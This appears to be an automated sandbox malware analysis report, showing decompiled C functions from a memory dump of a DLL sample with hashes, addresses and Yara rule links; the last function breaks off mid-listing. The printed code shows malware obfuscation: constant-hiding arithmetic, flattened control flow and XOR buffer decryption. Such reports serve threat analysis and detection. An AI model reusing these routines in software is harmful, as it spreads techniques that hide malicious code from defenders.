Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: 1D413572E00219EBEF08DFA5D84A9EEFBB2FB44304F208059D115BB290D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B46187, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B46187(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t52;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				signed int* _t64;

				_t58 = __ecx;
				_t64 =  &_v36;
				_v12 = 0x9a6334;
				_t59 = 0x428baaa;
				_v8 = 0x1104ea;
				_t62 = 0;
				_v4 = 0;
				_v28 = 0xb15b0c;
				_t61 = __ecx;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0xf86649d6;
				_v28 = _v28 ^ 0xec767c96;
				_v36 = 0x38db19;
				_v36 = _v36 ^ 0x5bdda26a;
				_v36 = _v36 + 0xffff005e;
				_v36 = _v36 | 0xaa371973;
				_v36 = _v36 ^ 0xfbf0c1f1;
				_v32 = 0x2e8edf;
				_v32 = _v32 | 0x3500a324;
				_v32 = _v32 ^ 0x353f0f34;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000af409;
				_v16 = 0xfc04c2;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000f83ee;
				_v20 = 0xce9672;
				_v20 = _v20 | 0xcae5864f;
				_v20 = _v20 ^ 0xcae41209;
				_v24 = 0x20b296;
				_v24 = _v24 | 0x98e19d34;
				_v24 = _v24 ^ 0x98e5764e;
				do {
					while(_t59 != 0x2638d08) {
						if(_t59 == 0x428baaa) {
							_t59 = 0x994f089;
							continue;
						} else {
							if(_t59 == 0x994f089) {
								_push(_t58);
								_t56 = E02B407F0();
								_t64 =  &(_t64[1]);
								_t59 = 0x2638d08;
								_t62 = _t62 + _t56;
								continue;
							}
						}
						goto L7;
					}
					_t58 = _t61 + 4;
					_t52 = E02B4BE8C(_t58, _v32, _v16, _v20, _v24);
					_t64 =  &(_t64[3]);
					_t59 = 0xb7af90a;
					_t62 = _t62 + _t52;
					L7:
				} while (_t59 != 0xb7af90a);
				return _t62;
			}

0x02b46187
0x02b46187
0x02b4618a
0x02b46192
0x02b46197
0x02b461a2
0x02b461a9
0x02b461b2
0x02b461c0
0x02b461c2
0x02b461c6
0x02b461ce
0x02b461d6
0x02b461de
0x02b461e6
0x02b461ee
0x02b461f6
0x02b461fe
0x02b46206
0x02b4620e
0x02b46216
0x02b4621b
0x02b46223
0x02b4622b
0x02b46230
0x02b46238
0x02b46240
0x02b46248
0x02b46250
0x02b46258
0x02b46260
0x02b46268
0x02b46268
0x02b46272
0x02b4628f
0x00000000
0x02b46274
0x02b46276
0x02b46280
0x02b46281
0x02b46286
0x02b46289
0x02b4628b
0x00000000
0x02b4628b
0x02b46276
0x00000000
0x02b46272
0x02b46297
0x02b462a6
0x02b462ab
0x02b462ae
0x02b462b3
0x02b462b5
0x02b462b5
0x02b462c6

Strings

^, xrefs: 02B461E6

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: 9e50127bcafabd6b94227125e44c854e652d1494814a7f9cddee57898227fc29
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: D93174722093429FC718CF24A58540FBBE5FBD4748F004A2DF986A2220D7B4DA1ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 02B4CAD5, Relevance: 1.3, Strings: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B4CAD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _t69;
				intOrPtr _t76;
				signed int _t78;
				signed int _t86;
				intOrPtr* _t87;

				_t87 = _a8;
				_t86 = _a12;
				_push(_t86);
				_push(_t87);
				_push(_a4);
				E02B4FE29(_t69);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v36 = 0xc93ec5;
				_a8 = 0xcab84b;
				_a8 = _a8 >> 1;
				_a8 = _a8 | 0xee18e3b9;
				_a8 = _a8 ^ 0xee71da74;
				_v16 = 0x1dfffe;
				_v16 = _v16 | 0x90f94c10;
				_v16 = _v16 ^ 0x90ff99a5;
				_v12 = 0xe4edc;
				_v12 = _v12 ^ 0xcefa836b;
				_v12 = _v12 ^ 0xcefa5bee;
				_a12 = 0xedd33e;
				_a12 = _a12 ^ 0xf7b2c6ca;
				_a12 = _a12 | 0xdc5ffd20;
				_a12 = _a12 ^ 0xadaf2279;
				_a12 = _a12 ^ 0x52f8ee07;
				_v8 = 0x14e12c;
				_t78 = 6;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t78;
				_v8 = _v8 ^ 0x002f50e1;
				_v24 = 0x3584ef;
				_v24 = _v24 ^ 0xd7b39bf3;
				_v24 = _v24 ^ 0xd7855a87;
				_v20 = 0x11ef3f;
				_v20 = _v20 ^ 0xad5d4e81;
				_v20 = _v20 ^ 0xad432fff;
				E02B40A90(_a8, _v16, _v12, _t86, _a12,  *((intOrPtr*)(_t87 + 4)));
				E02B4C9B0(_v8,  *((intOrPtr*)(_t86 + 0x34)), _v24,  *((intOrPtr*)(_t87 + 4)),  *_t87, _v20);
				_t76 =  *((intOrPtr*)(_t87 + 4));
				 *((intOrPtr*)(_t86 + 0x34)) =  *((intOrPtr*)(_t86 + 0x34)) + _t76;
				return _t76;
			}

0x02b4cadc
0x02b4cae0
0x02b4cae3
0x02b4cae4
0x02b4cae5
0x02b4caea
0x02b4caef
0x02b4caf5
0x02b4caf9
0x02b4cb00
0x02b4cb07
0x02b4cb0a
0x02b4cb11
0x02b4cb18
0x02b4cb1f
0x02b4cb26
0x02b4cb2d
0x02b4cb34
0x02b4cb3b
0x02b4cb42
0x02b4cb49
0x02b4cb50
0x02b4cb57
0x02b4cb5e
0x02b4cb65
0x02b4cb72
0x02b4cb73
0x02b4cb7b
0x02b4cb7e
0x02b4cb85
0x02b4cb8c
0x02b4cb93
0x02b4cb9a
0x02b4cba1
0x02b4cba8
0x02b4cbbf
0x02b4cbd5
0x02b4cbda
0x02b4cbe0
0x02b4cbe8

Strings

P/, xrefs: 02B4CB7E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: P/
API String ID: 0-4116444305
Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction ID: 6e1436924ac8cc9c4ac66132f0343b68366875a0461b8233b30eacb36f69fed1
Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction Fuzzy Hash: 8131437190130AEFCF08CFA1CA4699FBBB1FF44304F108549EA26A6220C7B59B61DF81

Uniqueness

Uniqueness Score: -1.00%

Function 02B52B09, Relevance: 1.3, Strings: 1, Instructions: 57
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E02B52B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t59;
				signed int _t68;
				void* _t74;

				_push(_a8);
				_t74 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t59);
				_v8 = 0x93d6ec;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0xffff3f9a;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00010f7f;
				_v16 = 0x446197;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xffff9430;
				_v16 = _v16 ^ 0x00039bf5;
				_v12 = 0x6cea88;
				_v12 = _v12 >> 1;
				_t68 = 0x54;
				_v12 = _v12 / _t68;
				_v12 = _v12 + 0x3de4;
				_v12 = _v12 ^ 0x00083458;
				_v20 = 0x13246e;
				_v20 = _v20 << 0xf;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x800a585e;
				_v20 = 0x9dc8c5;
				_v20 = _v20 + 0xe5f4;
				_v20 = _v20 + 0xffffcd2d;
				_v20 = _v20 ^ 0x00910c57;
				_v12 = 0x6d0957;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0xc39cd689;
				_v12 = _v12 ^ 0x6e460985;
				_v12 = _v12 ^ 0xad0dfd5a;
				return E02B40C2A(E02B528EB(), _v20, _t68, _v12, _t74);
			}

0x02b52b10
0x02b52b13
0x02b52b15
0x02b52b18
0x02b52b19
0x02b52b1a
0x02b52b1f
0x02b52b29
0x02b52b2f
0x02b52b36
0x02b52b3a
0x02b52b41
0x02b52b48
0x02b52b4c
0x02b52b53
0x02b52b5a
0x02b52b61
0x02b52b69
0x02b52b6c
0x02b52b6f
0x02b52b76
0x02b52b7d
0x02b52b84
0x02b52b88
0x02b52b8c
0x02b52b93
0x02b52b9a
0x02b52ba1
0x02b52ba8
0x02b52baf
0x02b52bb6
0x02b52bb9
0x02b52bc0
0x02b52bc7
0x02b52bef

Strings

Wm, xrefs: 02B52BAF

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wm
API String ID: 0-1953712011
Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction ID: 3a3aafc1c04e8e613897c08713414acc0d8f02cca5ec52d3bbbd933e2799140d
Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction Fuzzy Hash: DA21D271D01319EBDB59DFE4D84A4EEBFB1FB00318F108699D86966250D7B50B88DF81

Uniqueness

Uniqueness Score: -1.00%

Function 02B31CA1, Relevance: .1, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02B31CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v552;
				signed int _v556;
				intOrPtr _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* _t99;
				void* _t109;
				void* _t112;
				signed int _t126;
				signed int _t127;
				signed int* _t131;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t99);
				_v556 = _v556 & 0x00000000;
				_t131 =  &(( &_v600)[4]);
				_v560 = 0x11afe4;
				_v572 = 0x705fac;
				_v572 = _v572 >> 3;
				_t112 = 0x5dfd87c;
				_v572 = _v572 ^ 0x000e0be5;
				_v600 = 0x66ffbc;
				_v600 = _v600 << 5;
				_v600 = _v600 + 0xffffdeb6;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x019de099;
				_v564 = 0xb3cc88;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000695d5;
				_v576 = 0xedaac2;
				_v576 = _v576 | 0x8d88b270;
				_t126 = 0xa;
				_v576 = _v576 / _t126;
				_v576 = _v576 ^ 0x0e34170c;
				_v568 = 0xd34644;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x68c9882a;
				_v596 = 0xa76cec;
				_v596 = _v596 + 0xf564;
				_v596 = _v596 | 0x7a23d379;
				_t127 = 0x75;
				_v596 = _v596 / _t127;
				_v596 = _v596 ^ 0x010c78ac;
				_v588 = 0xf6d5ff;
				_v588 = _v588 ^ 0x1e4d5d29;
				_v588 = _v588 | 0xf865f4c1;
				_v588 = _v588 ^ 0xfef0a2a0;
				_v592 = 0xc86264;
				_v592 = _v592 + 0xffff9c97;
				_v592 = _v592 << 0xb;
				_v592 = _v592 + 0x20dd;
				_v592 = _v592 ^ 0x3ff909a0;
				_v584 = 0x196fa2;
				_v584 = _v584 >> 3;
				_v584 = _v584 | 0xe537cc6c;
				_v584 = _v584 ^ 0xe53246df;
				_v580 = 0xb6108b;
				_v580 = _v580 + 0xfdd;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x05ba306f;
				do {
					while(_t112 != 0x5b30f91) {
						if(_t112 == 0x5dfd87c) {
							_t109 = E02B4FE2A(_v600, _v564, _v572,  &_v552);
							_t112 = 0xb74f612;
							continue;
						} else {
							if(_t112 == 0xb74f612) {
								_t109 = E02B32F80( &_v520, _v576, _v568, _v596);
								_t131 =  &(_t131[3]);
								_t112 = 0x5b30f91;
								continue;
							}
						}
						goto L7;
					}
					E02B406FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
					_t131 =  &(_t131[6]);
					_t112 = 0xf20a46f;
					L7:
				} while (_t112 != 0xf20a46f);
				return _t109;
			}

0x02b31cab
0x02b31cb2
0x02b31cb9
0x02b31cba
0x02b31cbb
0x02b31cc0
0x02b31cc5
0x02b31cc8
0x02b31cd2
0x02b31cdf
0x02b31ce4
0x02b31ce6
0x02b31cf3
0x02b31d00
0x02b31d05
0x02b31d0d
0x02b31d12
0x02b31d1a
0x02b31d22
0x02b31d27
0x02b31d2f
0x02b31d37
0x02b31d45
0x02b31d4a
0x02b31d50
0x02b31d58
0x02b31d60
0x02b31d65
0x02b31d6d
0x02b31d75
0x02b31d7d
0x02b31d89
0x02b31d91
0x02b31d95
0x02b31d9d
0x02b31da5
0x02b31dad
0x02b31db5
0x02b31dbd
0x02b31dc5
0x02b31dcd
0x02b31dd2
0x02b31dda
0x02b31de2
0x02b31dea
0x02b31def
0x02b31df7
0x02b31dff
0x02b31e07
0x02b31e0f
0x02b31e14
0x02b31e1c
0x02b31e1c
0x02b31e22
0x02b31e55
0x02b31e5c
0x00000000
0x02b31e24
0x02b31e26
0x02b31e38
0x02b31e3d
0x02b31e40
0x00000000
0x02b31e40
0x02b31e26
0x00000000
0x02b31e22
0x02b31e82
0x02b31e87
0x02b31e8a
0x02b31e8c
0x02b31e8c
0x02b31e9a

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: 6ca8781d4be636cbbaa1def5e0815d9889325824f81840935116725a181ef819
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: 925153721093029FC715DF21D88951FBBE1FBD8B58F404A6CF19A96221D7B58A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 02B4FF58, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B4FF58(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t121;
				signed int* _t123;
				intOrPtr _t125;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;

				_v24 = 0xfb956e;
				_v24 = _v24 ^ 0xccd4b1e5;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x30bd930f;
				_v44 = 0xac147c;
				_t137 = __edx;
				_v44 = _v44 * 0x49;
				_v44 = _v44 ^ 0x31196cd2;
				_v8 = 0x40a8d3;
				_v8 = _v8 | 0x3acc4d3b;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3596af33;
				_v40 = 0x7a1af9;
				_v40 = _v40 | 0x9e6699ed;
				_v40 = _v40 ^ 0x9e79921f;
				_v28 = 0x2e80d;
				_v28 = _v28 | 0x96bed856;
				_v28 = _v28 + 0x6398;
				_v28 = _v28 ^ 0x96be47ad;
				_v16 = 0x1a939;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xffff851f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0002802d;
				_v12 = 0x8a82de;
				_v12 = _v12 + 0xffff96d2;
				_v12 = _v12 << 0xd;
				_t138 = 0x7d;
				_v12 = _v12 / _t138;
				_v12 = _v12 ^ 0x00892f26;
				_v48 = 0xf49a5c;
				_v48 = _v48 + 0x7176;
				_v48 = _v48 ^ 0x00fa98c0;
				_v52 = 0x2df28f;
				_t139 = 0x75;
				_v52 = _v52 / _t139;
				_v52 = _v52 ^ 0x0004ae50;
				_v36 = 0xfa4daf;
				_v36 = _v36 << 0xc;
				_t140 = 0x6f;
				_v36 = _v36 * 0x11;
				_v36 = _v36 ^ 0xf2876c8f;
				_v32 = 0x3a5591;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00085aff;
				_v20 = 0x5fc7f5;
				_v20 = _v20 / _t140;
				_v20 = _v20 << 0xc;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000581a9;
				_push(_v40);
				_push(_v8);
				_push(_v44);
				_t121 = E02B352B9(E02B4E1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
				_t125 =  *0x2b5620c; // 0x0
				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
				return E02B4FECB(_t120, _v52, _v36, _v32, _v20);
			}

0x02b4ff5e
0x02b4ff65
0x02b4ff6c
0x02b4ff70
0x02b4ff77
0x02b4ff86
0x02b4ff8a
0x02b4ff8d
0x02b4ff94
0x02b4ff9b
0x02b4ffa2
0x02b4ffa6
0x02b4ffaa
0x02b4ffb1
0x02b4ffb8
0x02b4ffbf
0x02b4ffc6
0x02b4ffcd
0x02b4ffd4
0x02b4ffdb
0x02b4ffe2
0x02b4ffe9
0x02b4ffed
0x02b4fff4
0x02b4fff8
0x02b4ffff
0x02b50006
0x02b5000d
0x02b50014
0x02b50019
0x02b5001e
0x02b50025
0x02b5002c
0x02b50033
0x02b5003a
0x02b50044
0x02b50049
0x02b5004e
0x02b50055
0x02b5005c
0x02b50064
0x02b50065
0x02b50068
0x02b5006f
0x02b50076
0x02b5007a
0x02b5007e
0x02b50085
0x02b50091
0x02b50094
0x02b50098
0x02b5009c
0x02b500a3
0x02b500a6
0x02b500a9
0x02b500c4
0x02b500c9
0x02b500d2
0x02b500ee

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b31e0ccc62e8efe0c2ca89fe6031fece5fcee8de2aa810ad5818d7fb01f8a10
Instruction ID: 1b77284ef376aab29b135e045786c9720625db23ce71c7fd01adafe8e1e26304
Opcode Fuzzy Hash: 2b31e0ccc62e8efe0c2ca89fe6031fece5fcee8de2aa810ad5818d7fb01f8a10
Instruction Fuzzy Hash: 2641FE71D0122DEBCF09DFA5D94A4DEBFB2FB48314F108199D521B6220D3B90A59DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02B44244, Relevance: .1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02B44244(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t49;
				signed int _t51;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t77;
				signed int* _t78;
				signed int* _t79;
				unsigned int _t81;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t93;

				_push( *(_t91 + 0x2c));
				_push( *(_t91 + 0x2c));
				_push( *((intOrPtr*)(_t91 + 0x18)));
				_t49 = E02B4FE29( *((intOrPtr*)(_t91 + 0x18)));
				 *(_t91 + 0x28) = 0x3d5cbc;
				_t5 =  &(_t49[1]); // 0x4
				_t78 = _t5;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) | 0x6bd7da0a;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) ^ 0x6bf86309;
				 *(_t91 + 0x38) = 0xea1d3d;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0x10653bc0;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0x4ee4a363;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0xb4800a62;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0xfe847125;
				 *(_t91 + 0x24) = 0x45f786;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) | 0x34f761f8;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) ^ 0x34f5c6b3;
				 *(_t91 + 0x20) = 0xc15f52;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92036f91;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92c36404;
				_t68 =  *_t49;
				_t79 =  &(_t78[1]);
				_t51 =  *_t78 ^ _t68;
				 *(_t91 + 0x2c) = _t68;
				 *(_t91 + 0x30) = _t51;
				_t31 = _t51 + 1; // 0x1
				_t81 =  !=  ? (_t31 & 0xfffffffc) + 4 : _t31;
				_t65 = E02B3C5D8(_t81);
				_t93 = _t91 + 0x18;
				 *(_t93 + 0x24) = _t65;
				if(_t65 != 0) {
					_t89 = 0;
					_t77 = _t65;
					_t87 =  >  ? 0 :  &(_t79[_t81 >> 2]) - _t79 + 3 >> 2;
					if(_t87 != 0) {
						_t66 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t79;
							_t79 =  &(_t79[1]);
							_t73 = _t72 ^ _t66;
							 *_t77 = _t73;
							_t77 =  &(_t77[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t77 - 3)) = _t73 >> 8;
							 *(_t77 - 2) = _t74;
							_t89 = _t89 + 1;
							 *((char*)(_t77 - 1)) = _t74 >> 8;
						} while (_t89 < _t87);
						_t65 =  *(_t93 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t65;
			}

0x02b4424e
0x02b44252
0x02b44256
0x02b44259
0x02b4425e
0x02b44266
0x02b44266
0x02b44269
0x02b44271
0x02b44279
0x02b44281
0x02b44289
0x02b44291
0x02b44299
0x02b442a1
0x02b442a9
0x02b442b1
0x02b442b9
0x02b442c1
0x02b442c9
0x02b442d1
0x02b442d5
0x02b442d8
0x02b442da
0x02b442de
0x02b442e2
0x02b442f2
0x02b4430e
0x02b44310
0x02b44313
0x02b44319
0x02b44321
0x02b44323
0x02b44334
0x02b44339
0x02b4433b
0x02b4433f
0x02b4433f
0x02b44341
0x02b44344
0x02b44346
0x02b4434d
0x02b44350
0x02b44353
0x02b44356
0x02b4435c
0x02b4435d
0x02b44360
0x02b44364
0x02b44364
0x02b4436d
0x02b4436d
0x02b44379

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction ID: 013db1bfeb0f0878192120927d75d15f80f3a41497c696edc95594be4f090e90
Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction Fuzzy Hash: B93169726093518FC305CF28D48195BFBE0FB88658F454BADF88AA7221D774DA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02B43D85, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02B43D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				void* _t46;
				signed int _t49;
				signed int* _t63;
				void* _t69;
				signed int _t72;
				void* _t77;
				unsigned int _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t63 = _a4;
				_push(_a8);
				_push(_t63);
				_push(__edx);
				E02B4FE29(_t46);
				_v12 = 0xc30617;
				_t82 =  &(__edx[1]);
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000aeb3;
				_v20 = 0xf93b19;
				_v20 = _v20 * 0x55;
				_v20 = _v20 ^ 0x85e9037f;
				_v20 = _v20 + 0xffff2dcc;
				_v20 = _v20 ^ 0xd720e096;
				_v16 = 0x37fa8e;
				_v16 = _v16 ^ 0xc309fd15;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x018ad68f;
				_v24 = 0x2aa640;
				_v24 = _v24 | 0xaf302e4c;
				_v24 = _v24 << 2;
				_v24 = _v24 | 0xa0025b53;
				_v24 = _v24 ^ 0xbce807cd;
				_t49 =  *__edx;
				_t83 =  &(_t82[1]);
				_t72 =  *_t82 ^ _t49;
				_v8 = _t49;
				_v4 = _t72;
				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
				_t84 = E02B3C5D8(_t79);
				if(_t84 == 0) {
					L6:
					return _t84;
				}
				_t81 = 0;
				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
				if(_t77 == 0) {
					L4:
					if(_t63 != 0) {
						 *_t63 = _v4;
					}
					goto L6;
				}
				_t69 = _t84 - _t83;
				do {
					_t81 = _t81 + 1;
					 *(_t69 + _t83) =  *_t83 ^ _v8;
					_t83 =  &(_t83[1]);
				} while (_t81 < _t77);
				goto L4;
			}

0x02b43d89
0x02b43d90
0x02b43d94
0x02b43d95
0x02b43d97
0x02b43d9c
0x02b43da4
0x02b43da7
0x02b43dac
0x02b43db4
0x02b43dc1
0x02b43dc5
0x02b43dcd
0x02b43dd5
0x02b43ddd
0x02b43de5
0x02b43ded
0x02b43df2
0x02b43dfa
0x02b43e02
0x02b43e0a
0x02b43e0f
0x02b43e17
0x02b43e1f
0x02b43e23
0x02b43e26
0x02b43e28
0x02b43e2e
0x02b43e3f
0x02b43e5b
0x02b43e62
0x02b43ea2
0x02b43ea9
0x02b43ea9
0x02b43e6c
0x02b43e7a
0x02b43e7f
0x02b43e96
0x02b43e98
0x02b43e9e
0x02b43e9e
0x00000000
0x02b43e98
0x02b43e83
0x02b43e85
0x02b43e8b
0x02b43e8c
0x02b43e8f
0x02b43e92
0x00000000

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: 02d03a7af48f4fb43c3a4b5be23aded7efb8f6fc4e7134e8ec8cace1efd8a91a
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: B13189726093008FD718DF29C98540BBBE2FBC8718F184B6DE489A3214DB74DA058F56

Uniqueness

Uniqueness Score: -1.00%

Function 02B3F0E9, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E02B3F0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t69;
